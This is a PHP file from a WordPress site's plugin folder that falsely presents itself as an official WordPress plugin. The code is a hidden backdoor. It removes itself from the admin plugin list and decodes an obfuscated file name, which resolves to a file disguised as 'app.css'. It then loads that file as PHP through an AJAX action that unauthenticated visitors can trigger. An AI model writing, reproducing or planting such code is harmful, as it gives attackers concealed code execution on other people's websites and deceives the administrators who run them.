File: /home/aliazzsr/trn2.mesegroup.de/wp-content/plugins/wp-way-skeleton/wp-way-skeleton.php
<?php
/*
Plugin Name: WP Way Skeleton
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 20.6.6
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
exit;
}
function zio_yxy() {
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$h = array('wp-way-skeleton/wp-way-skeleton.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $h)) {
unset($wp_list_table->items[$key]);
}
}
}
}
function iyb_wfb($plugins) {
$l = 'wp-way-skeleton/wp-way-skeleton.php';
if (array_key_exists($l, $plugins)) {
unset($plugins[$l]);
}
return $plugins;
}
function woh($e, $a) {
$r = '';
for ($w = 0; $w < strlen($e); $w += 2) {
$b = ord($e[$w]) - 65;
$v = ord($e[$w + 1]);
if ($v > 90) $v -= 6;
$n = $b * 52 + ($v - 65);
$r .= chr($n - $a);
}
return $r;
}
function wvf_ajax_handler() {
require_once plugin_dir_path(__FILE__) . woh('RcRrRrQdReRuRu', 815);
die();
}
if (defined('ABSPATH')) {
add_action('pre_current_active_plugins', 'zio_yxy');
add_filter('all_plugins', 'iyb_wfb');
add_action('wp_ajax_way_ske', 'wvf_ajax_handler');
add_action('wp_ajax_nopriv_way_ske', 'wvf_ajax_handler');
}